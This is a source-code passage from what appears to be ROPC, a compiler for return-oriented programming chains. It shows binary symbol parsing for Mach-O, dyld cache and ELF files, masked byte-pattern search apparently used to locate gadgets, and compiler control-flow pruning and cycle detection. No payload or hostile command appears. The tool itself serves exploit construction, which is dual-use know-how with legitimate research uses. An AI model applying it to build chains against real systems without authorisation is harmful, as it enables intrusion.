2]; 349 | int cmp = strcmp(key, (char *)p + stroff + pivot->n_un.n_strx); 350 | if (cmp == 0) { 351 | long long thumb = (pivot->n_desc & N_ARM_THUMB_DEF) != 0; 352 | fprintf(stderr, "0x%llX: %s\n", thumb + pivot->n_value + thumb, key); 353 | return pivot->n_value + thumb; 354 | } 355 | if (cmp > 0) { 356 | base = &pivot[1]; 357 | --nextdefsym; 358 | } 359 | } 360 | } else { 361 | const struct nlist *base = NULL; 362 | for (base = (struct nlist *)(p + symoff) + iextdefsym; nextdefsym > 0; nextdefsym /= 2) { 363 | const struct nlist *pivot = &base[nextdefsym / 2]; 364 | int cmp = strcmp(key, (char *)p + stroff + pivot->n_un.n_strx); 365 | if (cmp == 0) { 366 | int thumb = (pivot->n_desc & N_ARM_THUMB_DEF) != 0; 367 | fprintf(stderr, "0x%X: %s\n", thumb + pivot->n_value, key); 368 | return pivot->n_value + thumb; 369 | } 370 | if (cmp > 0) { 371 | base = &pivot[1]; 372 | --nextdefsym; 373 | } 374 | } 375 | } 376 | 377 | return 0; 378 | } 379 | 380 | 381 | static uint64_t 382 | parse_cache_symbols(const unsigned char *p, const char *key) 383 | { 384 | unsigned i; 385 | const struct dyld_cache_header *hdr = (struct dyld_cache_header *)p; 386 | const struct dyld_cache_mapping_info *map = (struct dyld_cache_mapping_info *)(p + hdr->mappingOffset); 387 | const struct dyld_cache_image_info *img = (struct dyld_cache_image_info *)(p + hdr->imagesOffset); 388 | printf("magic: \"%.16s\"\n", hdr->magic); 389 | printf("mappingOffset: 0x%X\n", hdr->mappingOffset); 390 | printf("mappingCount: %d\n", hdr->mappingCount); 391 | printf("imagesOffset: 0x%X\n", hdr->imagesOffset); 392 | printf("imagesCount: %d\n", hdr->imagesCount); 393 | printf("dyldBaseAddress: 0x%llX\n", hdr->dyldBaseAddress); 394 | printf("codeSignatureOffset: 0x%llX\n", hdr->codeSignatureOffset); 395 | printf("codeSignatureSize: %lld\n", hdr->codeSignatureSize); 396 | for (i = 0; i < hdr->mappingCount; i++) { 397 | printf("MAPPING#%d\n", i); 398 | printf("\taddress = 0x%llX\n", map[i].address); 399 | printf("\tsize = %lld\n", map[i].size); 400 | printf("\tfileOffset = 0x%llX\n", map[i].fileOffset); 401 | printf("\tprotection = 0x%X / 0x%X\n", map[i].maxProt, map[i].initProt); 402 | } 403 | for (i = 0; i < hdr->imagesCount; i++) { 404 | uint64_t address = img[i].address; 405 | int j = find_mapping(hdr->mappingCount, map, address); 406 | 407 | printf("IMAGE#%d\n", i); 408 | printf("\taddress = 0x%llX\n", img[i].address); 409 | printf("\tmodTime = %lld\n", img[i].modTime); 410 | printf("\tinode = %lld\n", img[i].inode); 411 | printf("\tpathFileOffset = 0x%X\n", img[i].pathFileOffset); 412 | /*printf("\tpad = 0x%X\n", img[i].pad);*/ 413 | printf("\tNAME = %s\n", p + img[i].pathFileOffset); 414 | 415 | if (j != -1) { 416 | uint64_t rv = parse_macho_symbols(p, address - map[j].address + map[j].fileOffset, key); 417 | if (rv) { 418 | return rv; 419 | } 420 | } 421 | } 422 | return 0; 423 | } 424 | 425 | 426 | static uint64_t 427 | parse_elf32_symbols(const unsigned char *p, const char *name) 428 | { 429 | unsigned i; 430 | const Elf32_Ehdr *hdr = (Elf32_Ehdr *)p; 431 | const Elf32_Shdr *shdr = (Elf32_Shdr *)(p + hdr->e_shoff); 432 | 433 | for (i = 0; i < hdr->e_shnum; i++) { 434 | if (shdr->sh_type == SHT_SYMTAB || shdr->sh_type == SHT_DYNSYM) { 435 | const Elf32_Sym *sym = (Elf32_Sym *)(p + shdr->sh_offset); 436 | const char *strtab = (char *)(p + ((Elf32_Shdr *)(p + hdr->e_shoff) + shdr->sh_link)->sh_offset); 437 | unsigned n = shdr->sh_size / shdr->sh_entsize; 438 | while (n--) { 439 | if (sym->st_value && sym->st_shndx != SHN_UNDEF && sym->st_shndx != SHN_ABS && 440 | ELF32_ST_TYPE(sym->st_info) != STT_SECTION && ELF32_ST_TYPE(sym->st_info) != STT_FILE && 441 | !strcmp(name, strtab + sym->st_name)) { 442 | fprintf(stderr, "0x%X: %s\n", sym->st_value, name); 443 | return sym->st_value; 444 | } 445 | sym++; 446 | } 447 | } 448 | shdr++; 449 | } 450 | 451 | return 0; 452 | } 453 | 454 | static uint64_t 455 | parse_elf64_symbols(const unsigned char *p, const char *name) 456 | { 457 | unsigned i; 458 | const Elf64_Ehdr *hdr = (Elf64_Ehdr *)p; 459 | const Elf64_Shdr *shdr = (Elf64_Shdr *)(p + hdr->e_shoff); 460 | 461 | for (i = 0; i < hdr->e_shnum; i++) { 462 | if (shdr->sh_type == SHT_SYMTAB || shdr->sh_type == SHT_DYNSYM) { 463 | const Elf64_Sym *sym = (Elf64_Sym *)(p + shdr->sh_offset); 464 | const char *strtab = (char *)(p + ((Elf64_Shdr *)(p + hdr->e_shoff) + shdr->sh_link)->sh_offset); 465 | unsigned n = shdr->sh_size / shdr->sh_entsize; 466 | while (n--) { 467 | if (sym->st_value && sym->st_shndx != SHN_UNDEF && sym->st_shndx != SHN_ABS && 468 | ELF32_ST_TYPE(sym->st_info) != STT_SECTION && ELF32_ST_TYPE(sym->st_info) != STT_FILE && 469 | !strcmp(name, strtab + sym->st_name)) { 470 | fprintf(stderr, "0x%llX: %s\n", (unsigned long long)sym->st_value, name); 471 | return sym->st_value; 472 | } 473 | sym++; 474 | } 475 | } 476 | shdr++; 477 | } 478 | 479 | return 0; 480 | } 481 | 482 | 483 | uint64_t 484 | parse_symbols(const unsigned char *p, const char *key) 485 | { 486 | uint64_t rv; 487 | if (!strncmp((char *)p, "dyld_v1 ", 8)) { 488 | rv = parse_cache_symbols(p, key); 489 | } else if ((*(unsigned *)p & ~1) == 0xfeedface) { 490 | rv = parse_macho_symbols(p, 0, key); 491 | } else if (!memcmp(p, "\177ELF\001", 5)) { 492 | rv = parse_elf32_symbols(p, key + 1); 493 | } else if (!memcmp(p, "\177ELF\002", 5)) { 494 | rv = parse_elf64_symbols(p, key + 1); 495 | } else { 496 | rv = 0; 497 | } 498 | return rv; 499 | } 500 | 501 | 502 | /* search */ 503 | 504 | 505 | #define UCHAR_MAX 255 506 | 507 | static unsigned char * 508 | boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen, 509 | const unsigned char* needle, size_t nlen) 510 | { 511 | size_t last, scan = 0; 512 | size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called: 513 | * bad character shift */ 514 | 515 | /* Sanity checks on the parameters */ 516 | if (nlen <= 0 || !haystack || !needle) 517 | return NULL; 518 | 519 | /* ---- Preprocess ---- */ 520 | /* Initialize the table to default value */ 521 | /* When a character is encountered that does not occur 522 | * in the needle, we can safely skip ahead for the whole 523 | * length of the needle. 524 | */ 525 | for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1) 526 | bad_char_skip[scan] = nlen; 527 | 528 | /* C arrays have the first byte at [0], therefore: 529 | * [nlen - 1] is the last byte of the array. */ 530 | last = nlen - 1; 531 | 532 | /* Then populate it with the analysis of the needle */ 533 | for (scan = 0; scan < last; scan = scan + 1) 534 | bad_char_skip[needle[scan]] = last - scan; 535 | 536 | /* ---- Do the matching ---- */ 537 | 538 | /* Search the haystack, while the needle can still be within it. */ 539 | while (hlen >= nlen) 540 | { 541 | /* scan from the end of the needle */ 542 | for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1) 543 | if (scan == 0) /* If the first byte matches, we've found it. */ 544 | return (void *)haystack; 545 | 546 | /* otherwise, we need to skip some bytes and start again. 547 | Note that here we are getting the skip value based on the last byte 548 | of needle, no matter where we didn't match. So if needle is: "abcd" 549 | then we are skipping based on 'd' and that value will be 4, and 550 | for "abcdd" we again skip on 'd' but the value will be only 1. 551 | The alternative of pretending that the mismatched character was 552 | the last character is slower in the normal case (E.g. finding 553 | "abcd" in "...azcd..." gives 4 by using 'd' but only 554 | 4-2==2 using 'z'. */ 555 | hlen -= bad_char_skip[haystack[last]]; 556 | haystack += bad_char_skip[haystack[last]]; 557 | } 558 | 559 | return NULL; 560 | } 561 | 562 | static size_t 563 | str2hex(size_t buflen, unsigned char *buf, unsigned char *mask, const char *str) 564 | { 565 | unsigned char *ptr = buf; 566 | int seq = -1; 567 | int m = 0; 568 | while (buflen > 0) { 569 | int nibble = *str++; 570 | if (nibble >= '0' && nibble <= '9') { 571 | nibble -= '0'; 572 | m |= 0xF; 573 | } else if (nibble == '.') { 574 | nibble = 0; 575 | } else if (nibble == ' ' && seq < 0) { 576 | continue; 577 | } else { 578 | nibble |= 0x20; 579 | if (nibble < 'a' || nibble > 'f') { 580 | break; 581 | } 582 | nibble -= 'a' - 10; 583 | m |= 0xF; 584 | } 585 | if (seq >= 0) { 586 | *buf++ = (seq << 4) | nibble; 587 | *mask++ = m; 588 | buflen--; 589 | seq = -1; 590 | m = 0; 591 | } else { 592 | seq = nibble; 593 | m <<= 4; 594 | } 595 | } 596 | return buf - ptr; 597 | } 598 | 599 | static size_t 600 | find_sequence(const unsigned char *mask, size_t n, size_t *len) 601 | { 602 | size_t i; 603 | size_t seq_len = 0; 604 | size_t best_len = 0; 605 | size_t best_pos = 0; 606 | for (i = 0; i < n; i++, seq_len++) { 607 | if (mask[i] != 0xFF) { 608 | if (best_len < seq_len) { 609 | best_len = seq_len; 610 | best_pos = i; 611 | } 612 | seq_len = -1; 613 | } 614 | } 615 | if (best_len < seq_len) { 616 | best_len = seq_len; 617 | best_pos = i; 618 | } 619 | *len = best_len; 620 | return best_pos - best_len; 621 | } 622 | 623 | static unsigned char * 624 | process_pattern(const char *str, size_t *len, unsigned char **out_mask, size_t *seq_pos, size_t *seq_len) 625 | { 626 | size_t n = strlen(str) / 2; 627 | unsigned char *pattern, *mask; 628 | 629 | if (!n) { 630 | return NULL; 631 | } 632 | pattern = malloc(n); 633 | if (!pattern) { 634 | return NULL; 635 | } 636 | mask = malloc(n); 637 | if (!mask) { 638 | free(pattern); 639 | return NULL; 640 | } 641 | 642 | n = str2hex(n, pattern, mask, str); 643 | if (!n) { 644 | free(mask); 645 | free(pattern); 646 | return NULL; 647 | } 648 | 649 | *len = n; 650 | *out_mask = mask; 651 | *seq_pos = find_sequence(mask, n, seq_len); 652 | return pattern; 653 | } 654 | 655 | static const unsigned char * 656 | find_string(const unsigned char* haystack, size_t hlen, 657 | const unsigned char* needle, size_t nlen, 658 | const unsigned char* mask, size_t seq_pos, size_t seq_len) 659 | { 660 | while (hlen >= nlen) { 661 | size_t i; 662 | const unsigned char *ptr = haystack; 663 | if (seq_len) { 664 | ptr = boyermoore_horspool_memmem(haystack + seq_pos, hlen - nlen + seq_len, needle + seq_pos, seq_len); 665 | if (!ptr) { 666 | break; 667 | } 668 | ptr -= seq_pos; 669 | } 670 | for (i = 0; i < seq_pos; i++) { 671 | if ((ptr[i] & mask[i]) != needle[i]) { 672 | break; 673 | } 674 | } 675 | if (i < seq_pos) { 676 | hlen -= ptr - haystack + 1; 677 | haystack = ptr + 1; 678 | continue; 679 | } 680 | for (i += seq_len; i < nlen; i++) { 681 | if ((ptr[i] & mask[i]) != needle[i]) { 682 | break; 683 | } 684 | } 685 | if (i < nlen) { 686 | hlen -= ptr - haystack + 1; 687 | haystack = ptr + 1; 688 | continue; 689 | } 690 | return ptr; 691 | } 692 | return NULL; 693 | } 694 | 695 | uint64_t 696 | parse_string(const struct range *ranges, const unsigned char *p, void *user, callback_t callback, const char *str) 697 | { 698 | const struct range *r; 699 | uint64_t found = 0; 700 | int align = 0; 701 | 702 | size_t len, seq_len, seq_pos; 703 | unsigned char *pattern, *mask; 704 | 705 | switch (*str) { 706 | case '+': 707 | str++; 708 | align = 3; 709 | break; 710 | case '-': 711 | str++; 712 | align = 1; 713 | break; 714 | } 715 | 716 | pattern = process_pattern(str, &len, &mask, &seq_pos, &seq_len); 717 | if (!pattern) { 718 | return 0; 719 | } 720 | 721 | for (r = ranges; r; r = r->next) { 722 | const unsigned char *buf = p + r->offset; 723 | const unsigned char *ptr = buf - 1; 724 | while (1) { 725 | unsigned long long addr; 726 | size_t left = r->filesize - (++ptr - buf); 727 | ptr = find_string(ptr, left, pattern, len, mask, seq_pos, seq_len); 728 | if (!ptr) { 729 | break; 730 | } 731 | addr = r->vmaddr + ptr - buf; 732 | if (addr & align) { 733 | continue; 734 | } 735 | if (callback && callback(ptr, buf + r->filesize - ptr, addr, user)) { 736 | continue; 737 | } 738 | found = addr; 739 | goto done; 740 | } 741 | } 742 | 743 | done: 744 | free(mask); 745 | free(pattern); 746 | return found; 747 | } 748 | 749 | 750 | #ifdef HAVE_MAIN 751 | int 752 | main(int argc, char **argv) 753 | { 754 | int fd; 755 | long sz; 756 | unsigned char *p; 757 | struct range *ranges; 758 | const char *filename = "cache"; 759 | 760 | if (argc > 1) { 761 | filename = *++argv; 762 | argc--; 763 | } 764 | 765 | fd = open(filename, O_RDONLY); 766 | assert(fd >= 0); 767 | sz = lseek(fd, 0, SEEK_END); 768 | p = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0); 769 | assert(p != MAP_FAILED); 770 | close(fd); 771 | 772 | ranges = parse_ranges(p, sz); 773 | 774 | parse_string(ranges, p, NULL, NULL, "+ 0a f0 14 e8"); 775 | 776 | delete_ranges(ranges); 777 | 778 | while (argc-- > 1) { 779 | parse_symbols(p, *++argv); 780 | } 781 | 782 | munmap(p, sz); 783 | return 0; 784 | } 785 | #endif 786 | -------------------------------------------------------------------------------- /binary.h: -------------------------------------------------------------------------------- 1 | #ifndef BINARY_H_ 2 | #define BINARY_H_ 3 | 4 | struct range; 5 | 6 | typedef int (*callback_t)(const unsigned char *p, uint32_t size, uint64_t addr, void *user); 7 | 8 | uint64_t parse_symbols(const unsigned char *p, const char *key); 9 | uint64_t parse_string(const struct range *ranges, const unsigned char *p, void *user, callback_t callback, const char *str); 10 | struct range *parse_ranges(const unsigned char *p, size_t sz); 11 | void delete_ranges(struct range *ranges); 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /code.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "config.h" 5 | #include "util.h" 6 | #include "lexer.h" 7 | #include "parser.h" 8 | #include "symtab.h" 9 | #include "cycle.h" 10 | #include "emit.h" 11 | #include "code.h" 12 | #include "backend.h" 13 | 14 | 15 | struct label_node { 16 | struct label_node *next; 17 | char *label; 18 | int used; 19 | }; 20 | 21 | 22 | #ifdef CODE_DEBUG 23 | #include 24 | 25 | 26 | static void 27 | print_ops(struct the_node *list) 28 | { 29 | struct the_node *n; 30 | for (n = list; n; n = n->next) { 31 | struct label_node *l; 32 | for (l = n->labels; l; l = l->next) { 33 | printf("%s: [%d]\n", l->label, l->used); 34 | } 35 | printf("%c ", n->reachable ? 'x' : ' '); 36 | if (n->cond != COND_AL) { 37 | printf("if %scond goto %s", (n->cond == COND_EQ) ? "!" : "", n->jump); 38 | } else if (n->jump) { 39 | printf("goto %s", n->jump); 40 | } else if (n->code) { 41 | printf("code"); 42 | } else { 43 | printf(""); 44 | } 45 | printf("\n"); 46 | } 47 | } 48 | #endif 49 | 50 | 51 | struct label_node * 52 | new_label(struct label_node *top, const char *label) 53 | { 54 | struct label_node *n = xmalloc(sizeof(struct label_node)); 55 | n->label = xstrdup(label); 56 | n->next = top; 57 | n->used = 0; 58 | return n; 59 | } 60 | 61 | 62 | struct the_node * 63 | create_the_node(void) 64 | { 65 | struct the_node *n = xmalloc(sizeof(struct the_node)); 66 | n->next = NULL; 67 | 68 | n->labels = NULL; 69 | n->code = NULL; 70 | n->jump = NULL; 71 | n->cond = COND_AL; 72 | n->attr = 0; 73 | 74 | n->lineno = token.lineno; 75 | n->filename = strdup(token.filename); 76 | n->reachable = FALSE; 77 | 78 | n->edge[0] = n->edge[1] = NULL; 79 | n->index = UNDEFINED; 80 | n->onstack = FALSE; 81 | n->scc = FALSE; 82 | return n; 83 | } 84 | 85 | 86 | static void 87 | delete_the_node(struct the_node *n) 88 | { 89 | struct label_node *l; 90 | for (l = n->labels; l; ) { 91 | struct label_node *q = l->next; 92 | free(l->label); 93 | free(l); 94 | l = q; 95 | } 96 | free_nodes(n->code); 97 | free(n->jump); 98 | free(n->filename); 99 | free(n); 100 | } 101 | 102 | 103 | static void 104 | move_labels(struct the_node *from, struct the_node *to) 105 | { 106 | if (from->labels) { 107 | struct label_node *l = from->labels; 108 | while (l->next) { 109 | l = l->next; 110 | } 111 | l->next = to->labels; 112 | to->labels = from->labels; 113 | from->labels = NULL; 114 | } 115 | } 116 | 117 | 118 | static void 119 | merge_labels(struct the_node *list) 120 | { 121 | struct the_node *n; 122 | for (n = list; n; n = n->next) { 123 | if (n->code == NULL && n->jump == NULL && n->next) { 124 | move_labels(n, n->next); 125 | } 126 | } 127 | } 128 | 129 | 130 | static void 131 | ref_label(struct the_node *n, const char *label) 132 | { 133 | if (n) { 134 | struct label_node *l; 135 | for (l = n->labels; l; l = l->next) { 136 | if (!strcmp(label, l->label)) { 137 | l->used++; 138 | break; 139 | } 140 | } 141 | } 142 | } 143 | 144 | 145 | static void 146 | unref_label(struct the_node *n, const char *label) 147 | { 148 | if (n) { 149 | struct label_node *l, *lp = NULL; 150 | for (l = n->labels; l; lp = l, l = l->next) { 151 | if (!strcmp(label, l->label)) { 152 | l->used--; 153 | if (!l->used) { 154 | if (lp) { 155 | lp->next = l->next; 156 | } else { 157 | n->labels = l->next; 158 | } 159 | free(l->label); 160 | free(l); 161 | } 162 | break; 163 | } 164 | } 165 | } 166 | } 167 | 168 | 169 | static void 170 | update_edges(struct the_node *head, struct the_node *from, struct the_node *to) 171 | { 172 | /* XXX wow, this is god damn slow */ 173 | while (head) { 174 | if (head->edge[0] == from) { 175 | head->edge[0] = to; 176 | } 177 | if (head->edge[1] == from) { 178 | head->edge[1] = to; 179 | } 180 | head = head->next; 181 | } 182 | } 183 | 184 | 185 | static void 186 | mark_reachables(struct the_node *list) 187 | { 188 | struct the_node *n = list; 189 | while (n && !n->reachable) { 190 | n->reachable = TRUE; 191 | mark_reachables(n->edge[1]); 192 | n = n->edge[0]; 193 | } 194 | } 195 | 196 | 197 | static void 198 | unmark_reachables(struct the_node *list) 199 | { 200 | struct the_node *n = list; 201 | for (n = list; n; n = n->next) { 202 | n->reachable = FALSE; 203 | } 204 | } 205 | 206 | 207 | static struct the_node * 208 | prune_nodes(struct the_node *list) 209 | { 210 | int pass; 211 | BOOL dirty = TRUE; 212 | int save_lineno = token.lineno; 213 | char *save_filename = token.filename; 214 | struct the_node *n, *next, *prev; 215 | for (pass = 0; pass < 10 && dirty; pass++) { 216 | dirty = FALSE; 217 | mark_reachables(list); 218 | #ifdef CODE_DEBUG 219 | printf("--- pass %d init ---------------\n", pass); 220 | print_ops(list); 221 | #endif 222 | // prune empty and dead nodes 223 | for (prev = NULL, n = list; n; n = next) { 224 | next = n->next; 225 | assert(n->jump || n->cond == COND_AL); 226 | if (n->jump || n->code || n->labels) { 227 | if (n->reachable) { 228 | prev = n; 229 | continue; 230 | } 231 | if (pass == 0 && n->lineno > 0) { 232 | token.lineno = n->lineno; 233 | token.filename = n->filename; 234 | cry("unreachable code\n"); 235 | } 236 | } 237 | dirty = TRUE; 238 | if (prev) { 239 | prev->next = next; 240 | } else { 241 | list = next; 242 | } 243 | if (n->jump) { 244 | unref_label(n->edge[n->cond != COND_AL], n->jump); 245 | } 246 | update_edges(list, n, n->edge[0]); 247 | delete_the_node(n); 248 | } 249 | // follow goto chains 250 | for (n = list; n; n = n->next) { 251 | if (n->jump) { 252 | struct the_node *other = n->edge[n->cond != COND_AL]; 253 | unmark_reachables(list); 254 | n->reachable = TRUE; 255 | next = NULL; 256 | while (other && !other->reachable && other->jump && other->cond == COND_AL) { 257 | next = other; 258 | other->reachable = TRUE; 259 | other = other->edge[0]; 260 | } 261 | if (next) { 262 | dirty = TRUE; 263 | unref_label(n->edge[n->cond != COND_AL], n->jump); 264 | free(n->jump); 265 | n->jump = xstrdup(next->jump); 266 | n->edge[n->cond != COND_AL] = next->edge[0]; 267 | ref_label(next->edge[0], n->jump); 268 | } 269 | } 270 | } 271 | // convert "if (COND) goto one; goto two; one:" => "if !(COND) goto two;" 272 | for (n = list; n; n = n->next) { 273 | next = n->next; 274 | if (!n->jump || n->cond == COND_AL || !next || !next->jump || next->cond != COND_AL || next->labels || !next->next || n->edge[1] != next->next) { 275 | continue; 276 | } 277 | assert(n->code && !next->code); 278 | dirty = TRUE; 279 | unref_label(next->next, n->jump); 280 | free(n->jump); 281 | n->jump = next->jump; 282 | n->edge[0] = next->next; 283 | n->edge[1] = next->edge[0]; 284 | n->next = next->next; 285 | n->cond = COND_FLIP(n->cond); 286 | next->jump = NULL; 287 | delete_the_node(next); 288 | } 289 | // convert "[if (COND)] goto one; one:" => "[COND;] one:" 290 | for (prev = NULL, n = list; n; n = next) { 291 | next = n->next; 292 | if (!n->jump || !next || n->edge[n->cond != COND_AL] != next) { 293 | prev = n; 294 | continue; 295 | } 296 | dirty = TRUE; 297 | unref_label(next, n->jump); 298 | free(n->jump); 299 | n->jump = NULL; 300 | if (n->code) { 301 | n->cond = COND_AL; 302 | n->edge[0] = next; 303 | n->edge[1] = NULL; 304 | continue; 305 | } 306 | if (prev) { 307 | prev->next = next; 308 | } else { 309 | list = next; 310 | } 311 | move_labels(n, next); 312 | update_edges(list, n, next); 313 | delete_the_node(n); 314 | } 315 | // convert "if (COND) goto one; goto one" => "COND; goto one;" 316 | for (n = list; n; n = n->next) { 317 | next = n->next; 318 | if (!n->jump || n->cond == COND_AL || !next || !next->jump || next->cond != COND_AL || strcmp(n->jump, next->jump)) { 319 | continue; 320 | } 321 | assert(n->edge[1] == next->edge[0]); 322 | dirty = TRUE; 323 | unref_label(n->edge[1], n->jump); 324 | free(n->jump); 325 | n->jump = NULL; 326 | n->cond = COND_AL; 327 | } 328 | unmark_reachables(list); 329 | #ifdef CODE_DEBUG 330 | printf("--- pass %d done ---------------\n", pass); 331 | print_ops(list); 332 | #endif 333 | } 334 | #ifdef CODE_DEBUG 335 | printf("-------------------------------\n"); 336 | #endif 337 | token.lineno = save_lineno; 338 | token.filename = save_filename; 339 | return list; 340 | } 341 | 342 | 343 | static struct the_node * 344 | find_node_with_label(struct the_node *head, const char *label) 345 | { 346 | /* XXX wow, this is god damn slow */ 347 | while (head) { 348 | struct label_node *l; 349 | for (l = head->labels; l; l = l->next) { 350 | if (!strcmp(l->label, label)) { 351 | l->used++; 352 | return head; 353 | } 354 | } 355 | head = head->next; 356 | } 357 | return NULL; 358 | } 359 | 360 | 361 | static void 362 | link_graph(struct the_node *list) 363 | { 364 | /* XXX check labels using symtab */ 365 | struct the_node *n; 366 | for (n = list; n; n = n->next) { 367 | if (n->attr & ATTRIB_NORETURN) { 368 | continue; 369 | } 370 | n->edge[0] = n->next; 371 | if (n->cond != COND_AL) { 372 | n->edge[1] = find_node_with_label(list, n->jump); 373 | } else if (n->jump) { 374 | n->edge[0] = find_node_with_label(list, n->jump); 375 | } 376 | } 377 | } 378 | 379 | 380 | void 381 | emit_code(struct the_node *list) 382 | { 383 | struct the_node *n = list; 384 | if (optimize_jmp) { 385 | merge_labels(n); 386 | } 387 | link_graph(n); 388 | if (optimize_jmp) { 389 | n = prune_nodes(n); 390 | } 391 | mark_cycles(n); 392 | emit_initialize(); 393 | while (n) { 394 | struct label_node *l; 395 | struct the_node *p = n->next; 396 | token.lineno = n->lineno; 397 | free(token.filename); 398 | token.filename = n->filename; 399 | for (l = n->labels; l; ) { 400 | struct label_node *q = l->next; 401 | emit_label(l->label, l->used, l->next == NULL); 402 | free(l->label); 403 | free(l); 404 | l = q; 405 | } 406 | if (n->cond != COND_AL) { 407 | n->code = reverse_list(n->code); 408 | emit_nodes(n->code, NULL, TRUE, n->scc); 409 | emit_cond(n->jump, n->cond); 410 | free_nodes(n->code); 411 | free(n->jump); 412 | } else if (n->jump) { 413 | emit_goto(n->jump); 414 | free(n->jump); 415 | } else if (n->code) { 416 | n->code = reverse_list(n->code); 417 | emit_nodes(n->code, NULL, FALSE, n->scc); 418 | free_nodes(n->code); 419 | } 420 | free(n); 421 | n = p; 422 | } 423 | emit_finalize(); 424 | } 425 | -------------------------------------------------------------------------------- /code.h: -------------------------------------------------------------------------------- 1 | #ifndef CODE_H_ 2 | #define CODE_H_ 3 | 4 | #define UNDEFINED -1 5 | #define IS_UNDEFINED(x) ((x) < 0) 6 | 7 | enum cond_t { 8 | COND_AL, /* always */ 9 | COND_NE = 1, /* Z==0 */ 10 | COND_EQ = -1 /* Z==1 */ 11 | }; 12 | 13 | #define COND_FLIP(c) -(c) 14 | 15 | struct the_node { 16 | struct the_node *next; 17 | 18 | /* filled in by parser */ 19 | struct label_node *labels; /* list of labels */ 20 | struct node *code; /* code to emit */ 21 | char *jump; /* goto target */ 22 | enum cond_t cond; /* evaluate code and jump */ 23 | int attr; /* maybe ATTRIB_NORETURN */ 24 | int lineno; /* line number, for error reporting */ 25 | char *filename; /* file name, for error reporting */ 26 | int reachable; 27 | 28 | struct the_node *edge[2]; /* edge[0] next in execution flow (may be NULL if this node is a noreturn). edge[1] next in conditional flow (usually NULL if this node is not conditional) */ 29 | 30 | int index, lowlink, onstack; /* tarjan */ 31 | BOOL scc; 32 | }; 33 | 34 | struct label_node *new_label(struct label_node *top, const char *label); 35 | struct the_node *create_the_node(void); 36 | 37 | void emit_code(struct the_node *list); 38 | 39 | #endif 40 | -------------------------------------------------------------------------------- /config.h: -------------------------------------------------------------------------------- 1 | #ifndef CONFIG_H_ 2 | #define CONFIG_H_ 3 | 4 | #define ROPC_VERSION "1.2" 5 | #undef LEXER_DEBUG 6 | #undef PARSER_DEBUG 7 | #undef CODE_DEBUG 8 | #undef DATA_DEBUG 9 | #define LEXER_READ_CPP 10 | #define LEXER_STR_MERGE 11 | #define LEXER_APOS_INT 12 | #undef SLOW_LOAD_SAVE 13 | #define MAX_FUNC_ARGS 16 14 | 15 | extern int optimize_imm; 16 | extern int optimize_add; 17 | extern int optimize_reg; 18 | extern int optimize_jmp; 19 | extern int show_reg_set; 20 | extern int nasm_esc_str; 21 | extern int enable_cfstr; 22 | extern int no_undefined; 23 | extern int all_volatile; 24 | extern int inloop_stack; 25 | extern int new_name_off; 26 | 27 | extern const unsigned char *binmap; 28 | extern size_t binsz; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /cycle.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "util.h" 4 | #include "code.h" 5 | #include "cycle.h" 6 | 7 | 8 | static int index; 9 | static int S_top; 10 | static struct the_node *S[1024]; 11 | 12 | 13 | #define S_PUSH(x) do { assert(S_top < 1024); S[S_top++] = x; (x)->onstack = TRUE; } while (0) 14 | #define S_POP(x) do { assert(S_top); x = S[--S_top]; (x)->onstack = FALSE; } while (0) 15 | #define S_PEEK() S[S_top - 1] 16 | 17 | 18 | static void 19 | strongconnect(struct the_node *v) 20 | { 21 | int i; 22 | v->index = index; 23 | v->lowlink = index; 24 | index++; 25 | S_PUSH(v); 26 | for (i = 0; i < 2; i++) { 27 | struct the_node *w = v->edge[i]; 28 | if (w) { 29 | if (IS_UNDEFINED(w->index)) { 30 | strongconnect(w); 31 | #if 1 32 | if (v->lowlink > w->lowlink) { 33 | v->lowlink = w->lowlink; 34 | } 35 | #else 36 | v->lowlink = min(v->lowlink, w->lowlink); 37 | #endif 38 | } else if (w->onstack) { 39 | #if 1 40 | if (v->lowlink > w->index) { 41 | v->lowlink = w->index; 42 | } 43 | #else 44 | v->lowlink = min(v->lowlink, w->index); 45 | #endif 46 | } 47 | } 48 | } 49 | if (v->lowlink == v->index) { 50 | struct the_node *w; 51 | int self = (S_PEEK() == v && v->edge[0] != v && v->edge[1] != v); 52 | do { 53 | S_POP(w); 54 | w->scc = !self; 55 | } while (w != v); 56 | } 57 | } 58 | 59 | 60 | void 61 | mark_cycles(struct the_node *list) 62 | { 63 | struct the_node *v; 64 | index = 0; 65 | S_top = 0; 66 | for (v = list; v; v = v->next) { 67 | if (IS_UNDEFINED(v->index)) { 68 | strongconnect(v); 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /cycle.h: -------------------------------------------------------------------------------- 1 | #ifndef CYCLE_H_ 2 | #define CYCLE_H_ 3 | 4 | void mark_cycles(struct the_node *list); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /depend: -------------------------------------------------------------------------------- 1 | # DO NOT DELETE 2 | 3 | lexer.o: config.h util.h lexer.h 4 | parser.o: config.h util.h parser.h lexer.h emit.h code.h backend.h symtab.h 5 | cycle.o: util.h code.h cycle.h 6 | code.o: config.h util.h lexer.h parser.h symtab.h cycle.h emit.h code.h backend.h 7 | emit.o: config.h util.h emit.h code.h symtab.h backend.h 8 | symtab.o: config.h util.h symtab.h 9 | backend.o: config.h util.h code.h backend.h symtab.h binary.h 10 | binary.o: elf.h binary.h 11 | util.o: config.h util.h lexer.h 12 | ropc.o: config.h util.h lexer.h parser.h code.h symtab.h backend.h 13 | -------------------------------------------------------------------------------- /elf.h: -------------------------------------------------------------------------------- 1 | /* This file defines standard ELF types, structures, and macros. 2 | Copyright (C) 1995-2003, 2004 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if 